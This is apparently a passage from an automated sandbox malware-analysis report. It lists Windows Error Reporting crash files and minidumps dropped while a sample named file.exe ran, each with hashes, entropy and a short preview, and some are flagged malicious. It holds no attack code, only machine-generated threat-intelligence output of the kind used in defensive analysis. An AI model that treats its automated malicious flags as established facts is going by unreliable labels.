                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.4.9.4.6.3.6.0.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.2.d.b.7.7.3.-.6.e.8.6.-.4.e.0.5.-.9.6.2.e.-.7.a.b.d.a.c.d.2.8.2.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.c.b.d.b.3.d.-.f.c.b.c.-.4.c.b.7.-.9.c.b.3.-.c.d.4.7.d.a.f.e.a.0.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_167963e1\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8220738451315124
                                                          Encrypted:false
                                                          SSDEEP:192:pZNVCfavtzH56rfI3jDk/u7sGS274ItmFBx:pZPx56rojg/u7sGX4ItU
                                                          MD5:A181BCB38630327512C0392B681B8817
                                                          SHA1:E14E7BD366AFD36B5EF879BFB37227733870A54B
                                                          SHA-256:3346D03DC9BAF42461F45AE80523ED776B2857EF4E9F510152B3F98968C64912
                                                          SHA-512:5B4E1294FDA5D9BC2669389DB7108FE63A201FF40BDF2F27707DD3025A68D03F8EA22422A2D530C8F16CAA262FE1D596AA8862C302EC1D146728BF97D2174F82
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.2.4.9.3.0.9.2.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.b.4.d.0.d.2.-.2.5.e.b.-.4.e.4.b.-.a.9.7.8.-.1.4.a.b.5.1.f.a.9.7.8.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.5.b.9.5.1.1.-.e.e.7.3.-.4.f.1.9.-.b.a.8.5.-.4.a.9.a.3.e.b.4.7.d.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_17059f44\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8358726160645562
                                                          Encrypted:false
                                                          SSDEEP:192:TVCfavQzH56rfI3jDB/u7sGS274ItmFBx:xe56rojl/u7sGX4ItU
                                                          MD5:7DB187678B90E69F643A256C73D8FB98
                                                          SHA1:39DCC475A02696D724E826957DC62EFE486DAD30
                                                          SHA-256:7EEE436EA17E5F6D286FF2279DC7ABAE5E12721FD46C37A45AE2EB3F3108F1E5
                                                          SHA-512:55E7909344B995867050E64701CAB51DAA9BAEA0BB0F73D11ACC31B04C013A73B0B7BDC5120D41BDB771D6DBA3AE0C0B5ADABC4E58695CB1751268010AA02A81
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.3.9.7.1.4.6.8.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.8.3.5.8.3.4.-.b.f.b.c.-.4.3.0.1.-.9.b.4.2.-.5.2.9.8.3.5.3.f.6.f.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.b.e.d.0.d.b.-.8.e.5.f.-.4.8.b.8.-.8.d.4.9.-.1.0.5.e.1.0.7.0.e.5.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1455.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:51 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):116820
                                                          Entropy (8bit):2.162723789176737
                                                          Encrypted:false
                                                          SSDEEP:768:wOGPMXXKWPMZGelnY29d1TBuFXMyU+VGAHIPlnS8:hXXKWPMZGe5Y29XTBuFXRVGAoPl9
                                                          MD5:7B8E0CF31A1D83FCE1AD7703BC66326B
                                                          SHA1:A8EC8B6D9EA928F15DA63334290FF7ED191D1EDA
                                                          SHA-256:1E4805447347214F5EDE9E9B8B34E023B0723E7E1340EC6A1C7361FD4A4E409A
                                                          SHA-512:1632D2DD884238857A89DB3B119E2DF9411D84C5271228E7289038D710234019C5138FB2C377C2871A4BDCCEAB5E312701DF75944CE7743FA1CDBA34F92D522D
                                                          Malicious:false
                                                          Preview:MDMP....... .......3.;c............D...............L.......d...rI..........T.......8...........T...........82..............$................................................................................U...........B..............GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER19C5.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8342
                                                          Entropy (8bit):3.700989303638173
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6C+6ZpZX6YqeSUGx+gmfB0SeBCpB2f89bLEsfJZm:RrlsNig6ZnX6YjSUu+gmfOSVL3fG
                                                          MD5:CC20ADE9E9BD1A3774B210796DC997D5
                                                          SHA1:CDC7E9842A42888C2CBC3FB0878B066862DB218E
                                                          SHA-256:AF2685AA560EDF48A470DF7A0D28AF60271EC6DEB686B5E151E45B74A3D177E2
                                                          SHA-512:688755D0C96E42923F61FFE1B6A24CF1ECED24010EC8361E101914B45F59349C1C59CB10461E55BCB1AD4FAB68E28DD5026463EE65FAF0DAE194BF0DEB31F35E
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A91.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.47248095416639
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYj/8fm8M4JbUZFIK+q86mYrZMjT4d:uITfYvqagrsqY4JwMK6YrZMX4d
                                                          MD5:F11AB740C2425A44E7801C6CBC141A3D
                                                          SHA1:4D38F93016F908EF4EF5F0055511620EE393B763
                                                          SHA-256:DB78236DD556454B1FDD6978367FF1D1F3B2886CA83ED5927381F935AF69CCDC
                                                          SHA-512:08D2D74ABD11A39D54E6B436C1D2D8C81CA9AE1958153C481FF281F9D6402D7EA07969203C8F601DA9D06C0503EA64810646FC28021715C9F609DF208EB48B65
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6095.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:05 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):50950
                                                          Entropy (8bit):2.270123045328824
                                                          Encrypted:false
                                                          SSDEEP:192:rVuX2UmxwtOPolF+4n72zkA8taYKciSgyf97wtWb1oNGELAUV27Gv4Vms6LLoA+S:9xnPQHnuhWf/qN9kk27Gkm/z
                                                          MD5:27801B40096192ED17A6D203766DC54D
                                                          SHA1:A100C0A471F04F07447CD50028D37D878044B2A8
                                                          SHA-256:553A7B782630C5BB578C6352CC044C44D6680E4DB37FB7AB946FEDB69D162E4D
                                                          SHA-512:2E852AD0C16AB333C667E3788DA23F2F51B4DCE8F7A778C891A202B3904D9EFB864235CC4B24698AB294B0285968906E51C61A78BBEB067AF3A838B09DF73D93
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................\................*..........T.......8...........T...........(..............(................................................................................U...........B..............GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E8.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8308
                                                          Entropy (8bit):3.7002240972170037
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Cz63g6YqzSUvggmfB0SeBCpBRg89bREsf0OTbm:RrlsNi96w6Y+SUvggmfOSddR3fTO
                                                          MD5:91FDE7D985825C6B53117B791E07A8D6
                                                          SHA1:6E63C6405EB66F03F0E57F8D74A5148ED96140E1
                                                          SHA-256:87727A8CB08AD3D3BCAE74FF4772FA60C3EC1E090C7904808ADAA1800CC01485
                                                          SHA-512:476B9C91426CB92D40E605EEC2C8EAD01BF2456EDE71DC923C1C690F77C3AF4787A974C69F42577A53816A85358DAB6FF88A0FDF3D72965931C2234EDEC480C2
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6385.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.4713509172613
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjr8fm8M4JbUZF/L+q86mYrZMjT4d:uITfjvqagrsqYkJw36YrZMX4d
                                                          MD5:7FC287076531EE62E457E6EEC8214486
                                                          SHA1:A5207F6E33E51F79CD11D765C86FA3093299F209
                                                          SHA-256:103C52FF99EF33CC62D2E11A5C99791DDB9FBA55C7C508A010114F8BADB0259C
                                                          SHA-512:282557C994C93FE9A680A449168296EB5958D84BF2F59929CAE215D3050BCAE2BC39233C5CBB2836956C42C5812528849FB0FC5FFF23D3BD6503406FA85E6BDF
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B15.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:08 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):64046
                                                          Entropy (8bit):2.33684318015984
                                                          Encrypted:false
                                                          SSDEEP:384:v/4MP40IYCYP/U1rCf6bgqhQ3qNLkk25GFvAR99mb:fP40ZarCzqhaGokPFU9mb
                                                          MD5:F7B153CFEC0ACEBD1ED8B70D17B9340A
                                                          SHA1:48D7C4201CFF584735B9C4CA6280025D5844D3E7
                                                          SHA-256:421C3361B597466600388ABB822CD80C53C26767F43BB6E780AB9169BC74569C
                                                          SHA-512:B8C9B151D38BD7A41F3BCA0B1CD6241E3B2144F78D1C10FE380310D17697860CB83E1B62D124E4ACC08DF3FE9E433E3C6DFEFB6E7218AF976B32A713002C65D2
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................4...........T...............T.......8...........T...............N...........0................................................................................U...........B..............GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D39.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8324
                                                          Entropy (8bit):3.7010978056776356
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Ct6L+6Yq+SUkOgmfB0SeBCpBSV89b0Esf08m:RrlsNiD6i6YzSUkOgmfOSF03fm
                                                          MD5:EB101CCD26A52D0C7114A3B08B5B2A61
                                                          SHA1:D147122AB36D17CCAC10415460C66ECC49D03B24
                                                          SHA-256:BD0CE9164045F5392DD9801F34E4945553D87D1D7426240A9649809A70AD99AB
                                                          SHA-512:09A272B3414EDCB44239CB384FCA55831DFA00A8F4BEAEBFE3F2983B071D0E34AA3AE5AA530A2C38A3A677EEDFC2449D685CA658E0C94A3F11619122F2566C52
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DC6.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.472013890568415
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjN8fm8M4JbUZF16+q86mYrZMjT4d:uITfjvqagrsqYOJwR66YrZMX4d
                                                          MD5:F6B7E8F49AA43131D5EFFE56976643C8
                                                          SHA1:5D6EAC7D7B6F1AE18693722E322D62A378C2B1B0
                                                          SHA-256:B5AA1C5B25A6B847C96489F63F383F9F09B8A22D55B40D67A82DA7B33163082C
                                                          SHA-512:9095864257890171CE0E51C39D646D074BE79CFE2A47434CB84A9C8D309D156F7657ABB9ED403BBA3633ED729CADCB95717BB08A42F5B1E05C22D57078985026
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER73B0.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:10 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):79800
                                                          Entropy (8bit):2.028796625566219
                                                          Encrypted:false
                                                          SSDEEP:384:MHuAw4ylPerdhnFJG4vB/qk/PzKhQ3qNLkk25GhgDUh:nA2PeRhV1P+haGokPEUh
                                                          MD5:C010EA8A0634D8BA3D4021BA5211D5BC
                                                          SHA1:573532933C5B3D3DD2E297F58976BBE087485AFA
                                                          SHA-256:D6134E749C4815BB253D650AC1B4EF97A7DC9405D00898E6F91DF02E434651E4
                                                          SHA-512:2F2539BA26FA51109843B938B1E8AD9F8136B850DFAF9B429F1CF807B4038DB4BDD8FD5701204F7A7917EDDBD571E52C83CDECF20F42FA85863B9FD4A784D0B5
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................4................7..........T.......8...........T...........p...H............................................................................................U...........B......D.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7632.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8326
                                                          Entropy (8bit):3.7040721630788607
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Cj+6a6Yq6SUYAgmfB0SeBCpB189bdEsf8fm:RrlsNid+6a6Y3SUYAgmfOSmd3fJ
                                                          MD5:99229F3B9EC8CACF8B0E3AF707C090DD
                                                          SHA1:B5BBB092893720A437166FAB783097709D1B639C
                                                          SHA-256:50DC2208A954F29C6C8ABEA57808F44601978AB6CE0E4E4FCEF550C967BA9423
                                                          SHA-512:D217BA7EC0F6963B04305D2C9EA8E9B0213005F5ECEC22E5AAEC8BD2D5D57A1CC59CF8B7C107FD831CD3E5FE30BC588C7FA45520257566D2316E0BE115712BD3
                                                          Malicious:false
